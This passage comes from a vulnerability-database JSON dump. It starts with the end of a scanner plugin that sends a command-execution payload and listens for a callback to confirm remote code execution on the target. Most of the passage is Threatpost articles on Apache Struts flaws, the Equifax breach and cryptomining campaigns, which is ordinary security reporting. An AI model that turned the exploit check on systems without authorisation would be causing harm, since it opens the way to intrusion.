0x09,0x31,0x32,0x37,0x2e,0x30,0x2e,0x31,0x2e,0x31,0xa5,\n0x3c,0xaf,0xf1,0x00,0x00,0x00,0x00,0x00,0x78);\n\nplen = raw_string( strlen( payload ) );\n\npayload = raw_string( 0x00,0x00,0x09 ) + plen + payload;\n\nfilter = 'tcp and src ' + get_host_ip() + ' and dst ' + this_host() + ' and dst port ' + lport;\n\nres = send_capture( socket:soc,\n data:payload,\n timeout:8,\n pcap_filter:filter );\n\nclose( soc );\n\nif( res ) {\n flags = get_tcp_element( tcp: res, element: \"th_flags\" );\n if( ( flags & TH_SYN ) ) {\n report = 'It was possible to execute the command `' + cmd + '` on the remote host. The TCP-SYN request to port ' + lport + ' was then successfully captured.';\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-05-30T05:51:17", "description": "Researchers are warning of a Chinese-language threat actor leveraging a wide array of Git repositories to infect vulnerable systems with Monero-based cryptomining malware.\n\nResearchers at Cisco Talos, who discovered the threat actor they call \u201cRocke\u201d, said they have been tracking the adversary since April as it continues to plant various Monero miners on vulnerable systems. Rocke\u2019s hallmark is the enlisting of toolkits that leverage Git repositories, HTTP File Servers (HFS) and a myriad of different payloads. The name Rocke was derived the the group\u2019s Monero wallet that includes \u201crocke@live.cn\u201d.\n\n\u201cRocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines,\u201d the research team said in a [post](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) Thursday. \u201cIt is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware.\u201d\n\nCisco Talos said it first spotted the threat actor in April 2018 when its malware was found in both Western and Chinese honeypots attempting to exploit the an Apache Struts vulnerability.\n\nA user named \u201cc-000\u201d first downloaded several files to the researchers\u2019 Struts 2 honeypot from the Chinese repository site (Gitee.com), researchers said. At the same time another user named \u201cc-18\u201d pulled down files in similar activity from a GitLab.com repository page. The repositories on both Gitee and GitLab were identical, leading researchers to determine they were the same actor. The repositories also contained similar files such as an array of ELF executables, shell scripts, and text files. Each executed and a variety of Monero-based cryptocurrency miners.\n\n\u201cAfter months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors,\u201d wrote David Liebenberg, senior threat analyst, who authored the Cisco Talos report.\n\nResearchers said they found the same threat actor exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting a critical Java deserialization vulnerability in the Adobe ColdFusion platform (CVE-2017-3066).\n\n## Recent Campaigns\n\nAs recently as late July, researchers said they discovered another similar campaign on their Struts 2 honeypot. The honeypot received a wget request (a command for downloading files from the internet) for a file called \u201c0720.bin.\u201d When researchers did some digging and visited the host this file was located on, they discovered that it contained a slew of additional files, including shell scripts and cryptominers.\n\nThose files included an Executable and Linkable (ELF) file called \u201c3307.bin,\u201d a shell script called \u201ca7\u201d that kills a variety of processes related to other cryptomining malware, as well as shell scripts \u201clowerv2.sh\u201d and \u201crootv2.sh,\u201d which attempt to download and execute cryptomining malware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/30151343/talos.png>)\n\nThey also found a file called \u201cconfig.json,\u201d which is a mining config file for open-source Monero miner XMRig. Another file, \u201cPools.txt,\u201d appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. Both miners have the same mining pool and wallet information.\n\nOther miners in the files include \u201cBashf,\u201d a variant of XMR-stak, and \u201cbashg,\u201d a variant of XMRig.\n\nFinally, Cisco Talos said it found a file dubbed \u201cTermsHost.exe,\u201d a PE 32 Monero miner, which researchers said can be purchased online for $14 and targets malicious actors: \u201cAdvertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \u2018Windows processes to bypass firewalls,'\u201d Liebenberg wrote.\n\nThe sample first grabs the config file \u201cxmr.txt\u201d containing the same configuration information as the previous files, from Rocke\u2019s command-and-control (C2) server, and then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool.\n\n\u201cIntriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system,\u201d researchers said.\n\n## Threat Actor\n\nLiebenberg said Cisco Talos was able to discover more about Rocke through several emails associated with the threat actor\u2019s MinerGate Monero wallet (rocke@live.cn and jxci@vip.qq.com): \u201cThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration,\u201d he said. \u201cSome of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food\u2026 It is possible that the \u2018jx\u2019 in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.\u201d\n\nThe payload is similar to one used by the [Iron Cybercrime Group](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>), Cisco Talos said: \u201cBoth Iron and Rocke\u2019s malware behave similarly, and reach out to similar infrastructure,\u201d they said. \u201cSo, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.\u201d\n\nLiebenberg pointed to cryptomining malware as increasing in popularity, with the Rocke threat actor an example of varying methods to download and execute various malware.\n\n\u201cDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating,\u201d they said. \u201cRocke\u2019s various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.\u201d\n", "cvss3": {}, "published": "2018-08-30T20:35:39", "type": "threatpost", "title": "New Threat Actor \u2018Rocke\u2019: A Rising Monero Cryptomining Menace", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "modified": "2018-08-30T20:35:39", "id": "THREATPOST:E43EB029B562B5665C8385E16145288A", "href": "https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird &amp; Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important 